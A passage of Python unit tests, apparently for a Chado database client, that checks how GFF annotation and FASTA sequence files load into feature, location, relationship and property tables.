self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
def test_load_gff_match(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
an_match = self._create_fake_an('matches')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'])
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
self.ci.feature.load_gff(gff="./test-data/matches.gff", analysis_id=an_match['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
# Check match
match_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein_XP_012228303.1_match_0001") \
.one()
matchterm = self.ci.get_cvterm_id('match', 'sequence')
matchpartterm = self.ci.get_cvterm_id('match_part', 'sequence')
assert match_f.dbxref_id is None, "gff>match loaded correctly"
assert match_f.organism_id == org['organism_id'], "gff>match loaded correctly"
assert match_f.name == "PAC:18136238-protein_XP_012228303.1_match_0001", "gff>match loaded correctly"
assert match_f.uniquename == "PAC:18136238-protein_XP_012228303.1_match_0001", "gff>match loaded correctly"
assert match_f.residues is None, "gff>match loaded correctly"
assert match_f.seqlen is None, "gff>match loaded correctly"
assert match_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>match loaded correctly"
assert match_f.type_id == matchterm, "gff>match loaded correctly"
assert match_f.is_analysis is False, "gff>match loaded correctly"
assert match_f.is_obsolete is False, "gff>match loaded correctly"
assert len(match_f.featureloc_collection) == 1, "gff>match loaded correctly"
assert match_f.featureloc_collection[0].srcfeature.uniquename == 'PAC:18136238-protein', "gff>match loaded correctly"
assert match_f.featureloc_collection[0].fmin == 50, "gff>match loaded correctly"
assert match_f.featureloc_collection[0].fmax == 325, "gff>match loaded correctly"
assert match_f.featureloc_collection[0].strand is None, "gff>match loaded correctly"
assert match_f.featureloc_collection[0].phase == 0, "gff>match loaded correctly"
# Check relationships
assert len(match_f.object_in_relationships) == 1, "match_part relationship"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert match_f.object_in_relationships[0].type_id == partofterm, "match_part relationship"
# Check gene featureprop
expected = [
'e-value___1e-27___0',
'hit_description___PREDICTED: uncharacterized protein LOC105675603 [Linepithema humile]___0',
'hit_name___XP_012228303.1___0'
]
assert len(match_f.featureprop_collection) == 3, "gff>match loaded correctly"
for prop in match_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>match loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
match_part = match_f.object_in_relationships[0].subject
assert match_part.dbxref_id is None, "gff>match loaded correctly"
assert match_part.organism_id == org['organism_id'], "gff>match loaded correctly"
assert match_part.name == "PAC:18136238-protein_XP_012228303.1_match_0001_1", "gff>match loaded correctly"
assert match_part.uniquename == "PAC:18136238-protein_XP_012228303.1_match_0001_1", "gff>match loaded correctly"
assert match_part.residues is None, "gff>match loaded correctly"
assert match_part.seqlen is None, "gff>match loaded correctly"
assert match_part.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>match loaded correctly"
assert match_part.type_id == matchpartterm, "match_part"
assert match_part.is_analysis is False, "gff>match loaded correctly"
assert match_part.is_obsolete is False, "gff>match loaded correctly"
assert len(match_part.featureloc_collection) == 1, "gff>match loaded correctly"
assert match_part.featureloc_collection[0].srcfeature.uniquename == 'PAC:18136238-protein', "gff>match loaded correctly"
assert match_part.featureloc_collection[0].fmin == 50, "gff>match loaded correctly"
assert match_part.featureloc_collection[0].fmax == 325, "gff>match loaded correctly"
assert match_part.featureloc_collection[0].strand is None, "gff>match loaded correctly"
assert match_part.featureloc_collection[0].phase == 1, "gff>match loaded correctly"
# Check gene featureprop
expected = [
'target___XP_012228303.1+21+302___0'
]
assert len(match_part.featureprop_collection) == 1, "gff>match loaded correctly"
for prop in match_part.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>match loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check analysisfeature
assert match_f.analysisfeature_collection[0].analysis_id == an_match['analysis_id'], "gff>match loaded correctly"
assert match_f.analysisfeature_collection[0].significance == 303, "gff>match loaded correctly"
assert match_part.analysisfeature_collection[0].analysis_id == an_match['analysis_id'], "gff>match loaded correctly"
assert match_part.analysisfeature_collection[0].significance == 303, "gff>match loaded correctly"
def test_load_gff_withpepfasta(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'])
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/prots.fa")
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues == "SGTRGVDFSVFDC", "gff>fasta seq loaded correctly"
assert pep_f.seqlen == 13, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum == "744bbb7c3f619a479ea90b4e9f627bd1", "gff>fasta seq loaded correctly"
def test_load_gff_withlandmarkfasta(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/genome.fa", landmark_type="supercontig")
# Check landmark
lm_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="scaffold00001") \
.one()
assert lm_f.residues.startswith("TTTTGTATTCTATGTCCTCTGATCTTT"), "gff>fasta seq loaded correctly"
assert lm_f.seqlen == 5927163, "gff>fasta seq loaded correctly"
assert lm_f.md5checksum == "80db0e5ccdc07e200c035d23c5951271", "gff>fasta seq loaded correctly"
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
assert mrna_f.residues.startswith("AAAGGAATTGAGTTTCATTAAGAATTTAAATAAAACAATGTCATAATCCGGGTATTTGGAATATT"), "gff>fasta seq loaded correctly"
assert mrna_f.seqlen == 1212, "gff>fasta seq loaded correctly"
assert mrna_f.md5checksum == "ad0d8a5031b63bacfe23296c80072550", "gff>fasta seq loaded correctly"
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues.startswith("KGIEFH*EFK*NNVIIRVFGIFKLQPGLVVMQRPTR*QNDNLALVLGFRSFVHSFSS*AKANWNLTKCNAYTSSEPEQHSSYKXXXXXXXXXXXXXXXXXXXXXX"), "gff>fasta seq loaded correctly"
assert pep_f.seqlen == 404, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum == "fbf522da5203405c620eb708afd3cc9f", "gff>fasta seq loaded correctly"
def test_load_gff_withlandmarkonly(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Here the gff will create a supercontig, and other features will be mapped on it.
# No fasta => no computed seq
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="supercontig")
# Check landmark
lm_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="scaffold00001") \
.one()
assert lm_f.residues is None, "gff>fasta seq loaded correctly"
assert lm_f.seqlen is None, "gff>fasta seq loaded correctly"
assert lm_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
assert mrna_f.residues is None, "gff>fasta seq loaded correctly"
assert mrna_f.seqlen is None, "gff>fasta seq loaded correctly"
assert mrna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues is None, "gff>fasta seq loaded correctly"
assert pep_f.seqlen is None, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
def test_load_gff_withexistinglandmarkonly(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
# No fasta => seq computed from alread loaded genome
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="supercontig")
# Check landmark
lm_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="scaffold00001") \
.one()
assert lm_f.residues is not None, "gff>fasta seq loaded correctly"
assert lm_f.seqlen is not None, "gff>fasta seq loaded correctly"
assert lm_f.md5checksum != "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
assert mrna_f.residues is not None, "gff>fasta seq loaded correctly"
assert mrna_f.seqlen is not None, "gff>fasta seq loaded correctly"
assert mrna_f.md5checksum != "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues is not None, "gff>fasta seq loaded correctly"
assert pep_f.seqlen is not None, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum != "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
@raises(Exception)
def test_load_gff_withoutlandmark(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Here the gff will create a supercontig, and the loader features will try to map on a contig => fail
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'])
def test_load_gff_withwronglandmarkonly(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Here the gff will create a supercontig and a contig, and other features will be mapped on contig.
# No fasta => no computed seq
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="contig")
contigterm = self.ci.get_cvterm_id('contig', 'sequence')
# Check landmark
lm_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="scaffold00001") \
.filter_by(type_id=contigterm) \
.one()
assert lm_f.residues is None, "gff>fasta seq loaded correctly"
assert lm_f.seqlen is None, "gff>fasta seq loaded correctly"
assert lm_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
assert mrna_f.residues is None, "gff>fasta seq loaded correctly"
assert mrna_f.seqlen is None, "gff>fasta seq loaded correctly"
assert mrna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues is None, "gff>fasta seq loaded correctly"
assert pep_f.seqlen is None, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
def test_load_gff_relranks(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="contig")
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
rels = mrna_f.object_in_relationships
locsorted_rels = []
for rel in rels:
if rel.type_id == partofterm:
locsorted_rels.append((rel.subject.featureloc_collection[0].fmin, rel.rank))
locsorted_rels = sorted(locsorted_rels, key=lambda x: x[0])
sorted_rels = sorted(locsorted_rels, key=lambda x: x[1])
assert locsorted_rels == sorted_rels, "children sorted correctly"
def test_load_gff_addonly(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/genome.fa", landmark_type="supercontig", no_seq_compute=True, add_only=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
src_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
.one()
assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
scaff1_id = src_f.feature_id
# Check gene aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
assert len(syns) == 2, "gff>gene aliases loaded correctly"
assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
# Check gene dbxref
dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
.filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
for db in dbs:
if db.name == "FOOBAR":
assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
dbs = {db.name: db.db_id for db in dbs}
assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>gene dbxrefs loaded correctly"
assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>gene dbxrefs loaded correctly"
assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>gene dbxrefs loaded correctly"
# Check gene featureprop
expected = [
'Gap___BLABLA___0',
'Gap___BLOBLO___1',
'Note___that\'s fantastic___0',
'Note___really___1',
'Poutrelle___test___1',
'Poutrelle___lapinou___0',
]
assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
for prop in gene_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
# Check mRNA feature
assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
assert rna_f.residues is None, "gff>mRNA loaded correctly"
assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
# Check mRNA loc
assert len(rna_f.featureloc_collection) == 1, "gff>pep located correctly"
assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
# Check mRNA aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
# Check mRNA dbxref
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>mRNA dbxrefs loaded correctly"
assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>mRNA dbxrefs loaded correctly"
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
assert pep_f.residues is None, "gff>pep loaded correctly"
assert pep_f.seqlen is None, "gff>pep loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
assert pep_f.is_analysis is False, "gff>pep loaded correctly"
assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
# Check pep loc
assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
assert len(children) == 15, "mRNA relationships, single peptide"
cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
exonterm = self.ci.get_cvterm_id('exon', 'sequence')
utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
for c in children:
assert children[c].type_id == partofterm, "subsubfeatures"
if children[c].subject.type_id == utr3term:
subsub_f = children[c].subject
assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
# Check a subsubfeature
assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.residues is None, "gff>utr loaded correctly"
assert subsub_f.seqlen is None, "gff>utr loaded correctly"
assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
# Check utr with 2 parents
confused_child_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='an_utr_with_two_parents') \
.all()
assert len(confused_child_f) == 1, "1 utr with 2 parents"
confused_rels = confused_child_f[0].subject_in_relationships
assert len(confused_rels) == 2, "1 utr with 2 parents"
for r in confused_rels:
assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
# Check Derives_from
derivesfrom = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='some_special_cds') \
.all()
assert len(derivesfrom) == 1, "derives_from"
derivesfrom_rels = derivesfrom[0].subject_in_relationships
assert len(derivesfrom_rels) == 2, "derives_from"
for r in derivesfrom_rels:
assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
assert len(terms) == 2, "gff>ontology_term loaded correctly"
assert '000001' in terms, "gff>ontology_term loaded correctly"
assert '00002' in terms, "gff>ontology_term loaded correctly"
assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
# Target location
assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
if derivesfrom[0].featureloc_collection[0].fmin == 120:
checkedloc = 0
else:
checkedloc = 1
assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>gene located correctly"
def test_load_gff_twice_addonly(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Adding twice the same gff with --add_only should raise some exception
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/genome.fa", landmark_type="supercontig", no_seq_compute=True)
try:
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True, add_only=True)
except Exception:
self.ci.session.rollback()
assert True
def test_load_gff_protein_id(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/ncbi.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], protein_id_attr="protein_id", no_seq_compute=True)
# CDS level protein_id
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="rna1537") \
.one()
assert rna_f.name == 'XM_008184899.2'
assert rna_f.uniquename == 'rna1537'
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
assert pep_f.name == "XM_008184899.2"
assert pep_f.uniquename == "XP_008183121.1"
# mRNA level protein_id
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="rna1539") \
.one()
assert rna_f.name == 'XM_008184894.2'
assert rna_f.uniquename == 'rna1539'
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
